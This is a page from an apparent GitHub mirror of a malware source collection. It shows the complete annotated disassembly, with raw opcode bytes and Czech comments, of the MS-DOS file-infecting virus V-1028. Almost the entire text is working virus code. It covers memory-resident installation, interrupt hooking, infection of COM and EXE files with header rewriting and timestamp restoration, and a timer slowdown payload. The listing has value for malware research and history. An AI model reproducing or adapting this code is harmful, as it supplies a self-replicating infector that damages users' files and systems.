Mirrors/vxug-MalwareSourceCode
13
1
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-28 09:52:32 +00:00
Code Releases Activity
71c7752aaa
vxug-MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.v-1028.lst
vxunderground 6bf46a48b9
Add files via upload
2021-01-12 18:04:54 -06:00

497 lines
25 KiB
Plaintext
Raw Blame History

; ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
; ³ ³
; ³ Virus V - 1028 ³
; ³ ³
; ³ Rozbor provedl v unoru 1991 Milos Bina ³
; ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
;
; ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
; ³ NOVY INT 1Ch ³
; ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
0000 9C PUSHF ; uschova registru
0001 1E PUSH DS
0002 51 PUSH CX
0003 50 PUSH AX
0004 33C0 XOR AX,AX ; ¿
0006 8ED8 MOV DS,AX ; ³ 3.byte citace hodin
0008 A06E04 MOV AL,[046E] ; Ù (zvetsuje se o 1 kazdou hodinu)
000B 0AC0 OR AL,AL
000D 7409 JZ 0018 ; citac nulovy
000F B99C04 MOV CX,049C ; ¿
0012 E2FE LOOP 0012 ; ³ zpozdovaci smycka
0014 FEC8 DEC AL ; ³ prodluzuje se kazdou hodinu
0016 75F7 JNZ 000F ; Ù
0018 58 POP AX ; obnova registru
0019 59 POP CX
001A 1F POP DS
001B 9D POPF
001C 2EFF2EEC03 JMP Far CS:[03EC] ; skok na puvodni INT 1ch
; skok na hostitele EXE
0021 8CC3 MOV BX,ES ; ¿
0023 83C310 ADD BX,0010 ; ³
0026 2E039CF603 ADD BX,CS:[03F6+SI] ; ³ vypocet startovni adresy
002B 2E895C4E MOV CS:[SI+4E],BX ; ³ a ulozeni za instrukci skoku
002F 90 NOP ; ³
0030 2E8B9CF403 MOV BX,CS:[03F4+SI] ; ³
0035 2E895C4C MOV CS:[SI+4C],BX ; Ù
0039 90 NOP
003A 8CC3 MOV BX,ES ; ¿
003C 83C310 ADD BX,0010 ; ³
003F 2E039CFA03 ADD BX,CS:[03FA+SI] ; ³ nastaveni SS:SP
0044 8ED3 MOV SS,BX ; ³
0046 2E8BA4F803 MOV SP,CS:[03F8+SI] ; Ù
004B EA00000000 JMP 0000:0000 ; skok na hostitele
; skok na hostitele COM
0050 BF0001 MOV DI,0100 ; ¿
0053 81C60004 ADD SI,0400 ; ³ obnova prvnich
0057 A4 MOVSB ; ³
0058 A5 MOVSW ; Ù
0059 8B260600 MOV SP,[0006] ; ¿
005D 33DB XOR BX,BX ; ³ obnova zasobniku
005F 53 PUSH BX ; Ù
0060 FF64F1 JMP [SI-0F] ; skok na hostitele
0063 90 NOP
; ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
; ³ STARTOVNI BOD ³
; ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
0064 E80000 CALL 0067 ; zjisteni ofsetu viru
0067 5E POP SI ; ¿
0068 FC CLD ; ³ vypocet adresy zacatku
0069 83C699 ADD SI,FF99 ; Ù viru (0000)
006C 81BC00044D5A CMP [0400+SI],5A4D ; jsem pripojen na EXE ?
0072 740E JZ 0082 ; ano
; pripojen na COM
0074 FA CLI ; ¿
0075 8BE6 MOV SP,SI ; ³ nastaveni zasobniku
0077 81C40405 ADD SP,0504 ; ³ za vir
007B FB STI ; Ù
007C 3B260600 CMP SP,[0006] ; vejde se zasobnik do volne pameti
0080 73CE JNC 0050 ; nevejde -> konec
; EXE
0082 50 PUSH AX ; uschova registru
0083 06 PUSH ES
0084 56 PUSH SI
0085 1E PUSH DS
0086 B8FE4B MOV AX,4BFE ; test, jestli uz jsem v pameti
0089 CD21 INT 21 ; volam svoji imaginarni sluzbu 4BFE
008B 81FFBB55 CMP DI,55BB ; nastaven muj priznak ?
008F 7504 JNZ 0095 ; jeste nenastaven
; uz jsem v pameti
0091 07 POP ES
0092 E9A100 JMP 0136 ; nebudu se instalovat -> konec
; instalace viru do pameti
0095 07 POP ES ; ¿
0096 B449 MOV AH,49 ; ³ uvolni pamet programu
0098 CD21 INT 21 ; Ù
009A BBFFFF MOV BX,FFFF ; ¿
009D B448 MOV AH,48 ; ³ cti maximalni pamet
009F CD21 INT 21 ; Ù
00A1 83EB45 SUB BX,0045 ; pamet aspon 450h byte ?
00A4 90 NOP
00A5 7303 JNC 00AA ; o.k
00A7 E98C00 JMP 0136 ; mala pamet -> konec
00AA 8CC1 MOV CX,ES ; ¿
00AC F9 STC ; ³
00AD 13CB ADC CX,BX ; ³ zabere vsechnu pamet
00AF B44A MOV AH,4A ; ³
00B1 CD21 INT 21 ; Ù
00B3 BB4400 MOV BX,0044 ; ¿
00B6 F9 STC ; ³ zmenseni pameti
00B7 26191E0200 SBB ES:[0002],BX ; Ù
00BC 06 PUSH ES ; ¿
00BD 8EC1 MOV ES,CX ; ³ zabere si pamet
00BF B44A MOV AH,4A ; ³
00C1 CD21 INT 21 ; Ù
00C3 8CC0 MOV AX,ES ; ¿
00C5 48 DEC AX ; ³
00C6 8ED8 MOV DS,AX ; ³
00C8 C70601000800 MOV [0001],0008 ; ³
00CE E89002 CALL 0361 ; ³
00D1 8BD8 MOV BX,AX ; ³
00D3 8BCA MOV CX,DX ; ³
00D5 1F POP DS ; ³ dalsi nastaveni
00D6 8CD8 MOV AX,DS ; ³ parametru pro instalaci
00D8 E88602 CALL 0361 ; ³ do pameti
00DB 03060600 ADD AX,[0006] ; ³
00DF 83D200 ADC DX,0000 ; ³
00E2 2BC3 SUB AX,BX ; ³
00E4 1BD1 SBB DX,CX ; ³
00E6 7204 JC 00EC ; ³
00E8 29060600 SUB [0006],AX ; ³
00EC 5E POP SI ; ³
00ED 56 PUSH SI ; Ù
00EE 1E PUSH DS
00EF 0E PUSH CS
00F0 33FF XOR DI,DI ; ¿
00F2 8EDF MOV DS,DI ; ³ uschova stare adresy
00F4 C5068400 LDS AX,[0084] ; ³ interruptu 21h
00F8 2E8984F003 MOV CS:[03F0+SI],AX ; ³
00FD 2E8C9CF203 MOV CS:[03F2+SI],DS ; Ù
0102 E86202 CALL 0367 ; ???????
0105 33FF XOR DI,DI ; ¿
0107 8EDF MOV DS,DI ; ³ ushova stare adresy
0109 C5067000 LDS AX,[0070] ; ³ interruptu 1ch
010D 2E8984EC03 MOV CS:[03EC+SI],AX ; ³
0112 2E8C9CEE03 MOV CS:[03EE+SI],DS ; Ù
0117 1F POP DS ; ¿
0118 B90302 MOV CX,0203 ; ³ presun vira do zabrane pameti
011B F3A5 REP MOVSW ; Ù
011D 33C0 XOR AX,AX ; ¿
011F 8ED8 MOV DS,AX ; ³
0121 C70670000000 MOV [0070],0000 ; ³ nastaveni novych
0127 8C067200 MOV [0072],ES ; ³ INT 21h a INT 1Ch
012B C70684004801 MOV [0084],0148 ; ³
0131 8C068600 MOV [0086],ES ; Ù
0135 07 POP ES ; obnova registru
0136 5E POP SI
0137 1F POP DS
0138 58 POP AX
0139 2E81BC00044D5A CMP CS:[0400+SI],5A4D
0140 7403 JZ 0145
0142 E90BFF JMP 0050 ; hostitel COM -> konec
0145 E9D9FE JMP 0021 ; hostitel EXE -> konec
; ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
; ³ NOVY INT 21h ³
; ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
0148 80FC4B CMP AH,4B
014B 7409 JZ 0156 ; sluzba spust program
014D 2EFF2EF003 JMP Far CS:[03F0] ; skok na puvodni int 21h
0152 BFBB55 MOV DI,55BB ; nastaveni priznaku, ze
; uz jsem v pameti
0155 CF IRET
0156 3CFE CMP AL,FE
0158 74F8 JZ 0152 ; volana moje sluzba dotazu
015A 0AC0 OR AL,AL
015C 75EF JNZ 014D ; volana sluzba zaved overlay
; -> konec
015E 9C PUSHF ; uschova registru
015F 50 PUSH AX
0160 53 PUSH BX
0161 51 PUSH CX
0162 52 PUSH DX
0163 56 PUSH SI
0164 57 PUSH DI
0165 55 PUSH BP
0166 06 PUSH ES
0167 1E PUSH DS
0168 8CDE MOV SI,DS
016A 33C0 XOR AX,AX ; ¿
016C 8ED8 MOV DS,AX ; ³ cteni adresy INT 24h
016E C4069000 LES AX,[0090] ; Ù
0172 06 PUSH ES ; uschova adresy
0173 50 PUSH AX
0174 C70690005E03 MOV [0090],035E ; ¿ nastaveni noveho INT 24h
017A 8C0E9200 MOV [0092],CS ; Ù
017E 8EDE MOV DS,SI ; ¿
0180 33C9 XOR CX,CX ; ³ cti attributy souboru
0182 B80043 MOV AX,4300 ; ³
0185 E85D02 CALL 03E5 ; Ù
0188 8BD9 MOV BX,CX ; ¿
018A 80E1F8 AND CL,F8 ; ³ test attributu
018D 3ACB CMP CL,BL ; ³
018F 7407 JZ 0198 ; Ù neni R/O, Hodden ani System
0191 B80143 MOV AX,4301 ; ¿ nastavi atribut R/W
0194 E84E02 CALL 03E5 ; Ù
0197 F9 STC
0198 9C PUSHF ; uschova reg.
0199 1E PUSH DS
019A 52 PUSH DX
019B 53 PUSH BX
019C B8023D MOV AX,3D02 ; ¿ otevre soubor pro cteni
019F E84302 CALL 03E5 ; Ù
01A2 720A JC 01AE ; chyba -> konec
01A4 8BD8 MOV BX,AX ; bx:=identifikator
01A6 E82A00 CALL 01D3 ; nakaza
01A9 B43E MOV AH,3E ; ¿ uzavri soubor
01AB E83702 CALL 03E5 ; Ù
01AE 59 POP CX ; obnova registru
01AF 5A POP DX
01B0 1F POP DS
01B1 9D POPF
01B2 7306 JNC 01BA ; neni chyba close
01B4 B80143 MOV AX,4301 ; ¿ obnova atributu
01B7 E82B02 CALL 03E5 ; Ù
01BA 33C0 XOR AX,AX ; ¿
01BC 8ED8 MOV DS,AX ; ³ obnova INT 24h
01BE 8F069000 POP [0090] ; ³
01C2 8F069200 POP [0092] ; Ù
01C6 1F POP DS ; obnova registru
01C7 07 POP ES
01C8 5D POP BP
01C9 5F POP DI
01CA 5E POP SI
01CB 5A POP DX
01CC 59 POP CX
01CD 5B POP BX
01CE 58 POP AX
01CF 9D POPF
01D0 E97AFF JMP 014D
; ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
; vstup: bx = identifikator souboru
; vystup: nakazeny soubor
01D3 0E PUSH CS ; ¿
01D4 0E PUSH CS ; ³ es:=cs
01D5 1F POP DS ; ³ ds:=cs
01D6 07 POP ES ; Ù
01D7 BA0404 MOV DX,0404 ; ¿
01DA B91800 MOV CX,0018 ; ³ cte prvnich 18h byte
01DD B43F MOV AH,3F ; ³ souboru na (cs:404h)
01DF E80302 CALL 03E5 ; Ù
01E2 33C9 XOR CX,CX ; ¿
01E4 33D2 XOR DX,DX ; ³ nastavi ukazatel v souboru
01E6 B80242 MOV AX,4202 ; ³ na jeho konec
01E9 E8F901 CALL 03E5 ; Ù
01EC 89161E04 MOV [041E],DX ; uschova hor. slova delky
01F0 3D0404 CMP AX,0404 ; test delky
01F3 83DA00 SBB DX,0000 ;
01F6 7258 JC 0250 ; soubor < 404h
01F8 A31C04 MOV [041C],AX ; ¿ uschova delky suboru
01FB A32004 MOV [0420],AX ; Ù
; budou testy, je-li soubor uz nakazen
01FE 813E04044D5A CMP [0404],5A4D
0204 7517 JNZ 021D ; pripojuje se na COM
; EXE
0206 A10C04 MOV AX,[040C] ; ¿
0209 03061A04 ADD AX,[041A] ; ³
020D E85101 CALL 0361 ; ³ dx:cx:=ukazatel do souboru
0210 03061804 ADD AX,[0418] ; ³ na jeho start
0214 83D200 ADC DX,0000 ; ³
0217 8BCA MOV CX,DX ; ³
0219 8BD0 MOV DX,AX ; Ù
021B EB15 JMP 0232
; COM
021D 803E0404E9 CMP [0404],E9 ; prvni instr. JMP Near
0222 752D JNZ 0251 ; ne => nenakazeno
0224 8B160504 MOV DX,[0405] ; ¿ dx:cx=^start
0228 81C20301 ADD DX,0103 ; Ù
022C 7223 JC 0251 ; chybna start. adr => nenakazeno
022E FECE DEC DH
0230 33C9 XOR CX,CX
0232 83EA64 SUB DX,0064 ; ¿
0235 83D900 SBB CX,0000 ; ³ nastaveni ukazatele v souboru
0238 B80042 MOV AX,4200 ; ³ na zacatek teoretickeho vira
023B E8A701 CALL 03E5 ; Ù
023E 050404 ADD AX,0404 ; ¿
0241 83D200 ADC DX,0000 ; ³
0244 3B061C04 CMP AX,[041C] ; ³ test, je-li startovni adresa
0248 7507 JNZ 0251 ; ³ 404h-64h byte od konce
024A 3B161E04 CMP DX,[041E] ; ³ souboru
024E 7501 JNZ 0251 ; Ù neni => nenakazeno
0250 C3 RET ; je => nakazeno -> konec
; soubor jeste nenakazen, ja ho nakazim
0251 33C9 XOR CX,CX ; ¿
0253 8BD1 MOV DX,CX ; ³ nastaveni ukazatele
0255 B80242 MOV AX,4202 ; ³ v souboru na konec
0258 E88A01 CALL 03E5 ; Ù
025B 813E04044D5A CMP [0404],5A4D
0261 7409 JZ 026C ; EXE
; COM
0263 050406 ADD AX,0604 ; ¿
0266 83D200 ADC DX,0000 ; ³ soubor+vir < 64KB ?
0269 7419 JZ 0284 ; Ù
026B C3 RET ; prelezl by -> konec
; EXE
026C 8B161C04 MOV DX,[041C] ; ¿
0270 F6DA NEG DL ; ³ posun ukazatele za soubor
0272 83E20F AND DX,000F ; ³ tak, aby jeho nova delka
0275 33C9 XOR CX,CX ; ³ byla nasobkem 10h
0277 B80142 MOV AX,4201 ; ³
027A E86801 CALL 03E5 ; Ù
027D A31C04 MOV [041C],AX ; ¿ uschova nove zaokrouhlene
0280 89161E04 MOV [041E],DX ; Ù delky
0284 B80057 MOV AX,5700 ; ¿ cti datum a cas vytvoreni souboru
0287 E85B01 CALL 03E5 ; Ù
028A 9C PUSHF ;
028B 51 PUSH CX ; uschova casu
028C 52 PUSH DX ; uschova data
028D 813E04044D5A CMP [0404],5A4D
0293 7405 JZ 029A
; COM
0295 B80001 MOV AX,0100 ; startovni adresa COM
0298 EB07 JMP 02A1
; EXE
029A A11804 MOV AX,[0418] ; ¿ EXEIP
029D 8B161A04 MOV DX,[041A] ; Ù ReloCS
; spolecne
02A1 BFF403 MOV DI,03F4 ; ¿
02A4 AB STOSW ; ³ uschova start. adr
02A5 8BC2 MOV AX,DX ; ³
02A7 AB STOSW ; Ù
02A8 A11404 MOV AX,[0414] ; ¿
02AB AB STOSW ; ³ uschova zasobniku
02AC A11204 MOV AX,[0412] ; ³ (smysl jen u EXE)
02AF AB STOSW ; Ù
02B0 A12004 MOV AX,[0420] ; dolni slovo delky pgmu
02B3 AB STOSW ;
02B4 A10804 MOV AX,[0408] ; ¿ PageCnt
02B7 AB STOSW ; Ù (smysl jen u EXE)
02B8 BE0404 MOV SI,0404 ; ¿
02BB A5 MOVSW ; ³ uschova prvnich 4 byte
02BC A5 MOVSW ; Ù souboru
02BD 33D2 XOR DX,DX ; ¿
02BF B90404 MOV CX,0404 ; ³ pripojeni vira k souboru
02C2 B440 MOV AH,40 ; ³ (404h byte)
02C4 E81E01 CALL 03E5 ; Ù
02C7 7227 JC 02F0 ; chyba -> konec
02C9 33C8 XOR CX,AX
02CB 7523 JNZ 02F0 ; nezapsan prislusny pocet byte
02CD 8BD1 MOV DX,CX ; ¿
02CF B80042 MOV AX,4200 ; ³ nastaveni ukazatele na
02D2 E81001 CALL 03E5 ; Ù zacatek souboru
02D5 813E04044D5A CMP [0404],5A4D
02DB 7415 JZ 02F2
; COM
02DD C6060404E9 MOV [0404],E9 ; ¿
02E2 A11C04 MOV AX,[041C] ; ³ nove prvni 3 byty
02E5 056100 ADD AX,0061 ; ³ viru (novy start)
02E8 A30504 MOV [0405],AX ; Ù
02EB B90300 MOV CX,0003 ; pocet byte k nahrani
02EE EB5A JMP 034A
02F0 EB60 JMP 0352 ; konec
; EXE
02F2 A10C04 MOV AX,[040C] ; ¿
02F5 E86900 CALL 0361 ; ³
02F8 F7D0 NOT AX ; ³
02FA F7D2 NOT DX ; ³
02FC 40 INC AX ; ³ vypocet nove
02FD 7501 JNZ 0300 ; ³ startovni adresy
02FF 42 INC DX ; ³ pro EXE soubor
0300 03061C04 ADD AX,[041C] ; ³
0304 13161E04 ADC DX,[041E] ; ³
0308 B91000 MOV CX,0010 ; ³
030B F7F1 DIV CX ; ³
030D C70618046400 MOV [0418],0064 ; ³
0313 A31A04 MOV [041A],AX ; Ù
0316 054100 ADD AX,0041 ; ¿
0319 A31204 MOV [0412],AX ; ³ novy zasobnik
031C C70614040001 MOV [0414],0100 ; Ù
0322 81061C040404 ADD [041C],0404 ; ¿
0328 83161E0400 ADC [041E],0000 ; ³
032D A11C04 MOV AX,[041C] ; ³
0330 25FF01 AND AX,01FF ; ³
0333 A30604 MOV [0406],AX ; ³
0336 9C PUSHF ; ³ vypocet nove delky
0337 A11D04 MOV AX,[041D] ; ³ souboru do hlavicky
033A D02E1F04 SHR B/[041F],1 ; ³ EXE
033E D1D8 RCR AX,1 ; ³
0340 9D POPF ; ³
0341 7401 JZ 0344 ; ³
0343 40 INC AX ; ³
0344 A30804 MOV [0408],AX ; Ù
0347 B91800 MOV CX,0018 ; pocet byte k nahrani
034A BA0404 MOV DX,0404 ; ¿ nahraje novy zacatek souboru
034D B440 MOV AH,40 ; ³ COM: prvni 3 byty
034F E89300 CALL 03E5 ; Ù EXE: prvnich 18h byte
0352 5A POP DX ; dx:=datum
0353 59 POP CX ; cx:=cas
0354 9D POPF
0355 7206 JC 035D ; chyba
0357 B80157 MOV AX,5701 ; ¿ obnova data a casu
035A E88800 CALL 03E5 ; Ù vytvoreni souboru
035D C3 RET
; ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
; ³ NOVY INT 24h ³
; ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
; instalovan docasne, pouze v dobe nakazy
035E B003 MOV AL,03
0360 CF IRET
; ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
; vstup: ax
; vystup: dx:ax:=ax*10h
0361 BA1000 MOV DX,0010
0364 F7E2 MUL DX
0366 C3 RET
; ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
0367 9C PUSHF
0368 50 PUSH AX
0369 1E PUSH DS
036A 06 PUSH ES
036B 33C0 XOR AX,AX
036D 8ED8 MOV DS,AX ; ds:=0;
036F C406A000 LES AX,[00A0] ; es:ax:=^INT 28h
0373 E84C00 CALL 03C2
0376 7436 JZ 03AE
0378 C4068000 LES AX,[0080] ; es:ax:=^INT 20h
037C E84300 CALL 03C2
037F 742D JZ 03AE
0381 C4069C00 LES AX,[009C] ; es:ax:=^INT 27h
0385 E83A00 CALL 03C2
0388 7424 JZ 03AE
038A C4069800 LES AX,[0098] ; es:ax:=^INT 26h
038E E83100 CALL 03C2
0391 741B JZ 03AE
0393 C4062400 LES AX,[0024] ; es:ax:=^INT 9h
0397 E82800 CALL 03C2
039A 7412 JZ 03AE
039C C4064C00 LES AX,[004C] ; es:ax:=^INT 13h
03A0 E81F00 CALL 03C2
03A3 7409 JZ 03AE
03A5 C4068400 LES AX,[0084] ; es:ax:=^INT 21h
03A9 E81600 CALL 03C2
03AC 750F JNZ 03BD
03AE 26C4062312 LES AX,ES:[1223]
03B3 2E8984F003 MOV CS:[03F0+SI],AX
03B8 2E8C84F203 MOV CS:[03F2+SI],ES
03BD 07 POP ES
03BE 1F POP DS
03BF 58 POP AX
03C0 9D POPF
03C1 C3 RET
; ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
03C2 26813E601C3D0F CMP ES:[1C60],0F3D ; CMP AX, 0Fxx
03C9 7519 JNZ 03E4
03CB 26813E641C05B8 CMP ES:[1C64],B805 ; ADD AX, B8xx
03D2 7510 JNZ 03E4
03D4 26813E681C9DCF CMP ES:[1C68],CF9D ; POPF, IRET
03DB 7507 JNZ 03E4
03DD 26813E6C1C3E28 CMP ES:[1C6C],283E ; SUB DS:
03E4 C3 RET
; volani puvodniho int 21h
03E5 9C PUSHF
03E6 2EFF1EF003 CALL Far CS:[03F0]
03EB C3 RET
03EC 53FF00F0 DD ? ; adresa puvodniho int 1ch
03F0 75032F14 DD ? ; adr. puv. int 21h
03F4 0001 DW ? ; EXEIP
03F6 F80E DW ? ; ReloCS
03F8 0074 DW ? ; EXESP
03FA 3D02 DW ? ; ReloSS
03FC BC62 DW ? ; dolni slovo delky puv. pgmu
03FE DA0A DW ? ; PageCnt
0400 E92D0DBA DB ?,?,?,? ; puvodni ctyri byty
; ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ toto jiz neni soucasti vira
; pripojeneho k souboru.
; Tato tabulka vznika pri behu
; hlavicka EXE
0404 DW ? ; sign
0406 DW ? ; PartPag
0408 DW ? ; PageCnt
040A DW ? ; ReloCnt
040C DW ? ; HdrSize
040E DW ? ; MinMem
0410 DW ? ; MaxMem
0412 DW ? ; ReloSS
0414 DW ? ; EXESP
0416 DW ? ; ChkSum
0418 DW ? ; EXEIP
041A DW ? ; ReloCS
041C DW ? ; dolni slovo delky pgmu ¿ zaokrouhleno
041E DW ? ; horni slovo delky pgmu Ù
0420 DW ? ; dolni slovo delky
View Git Blame Copy Permalink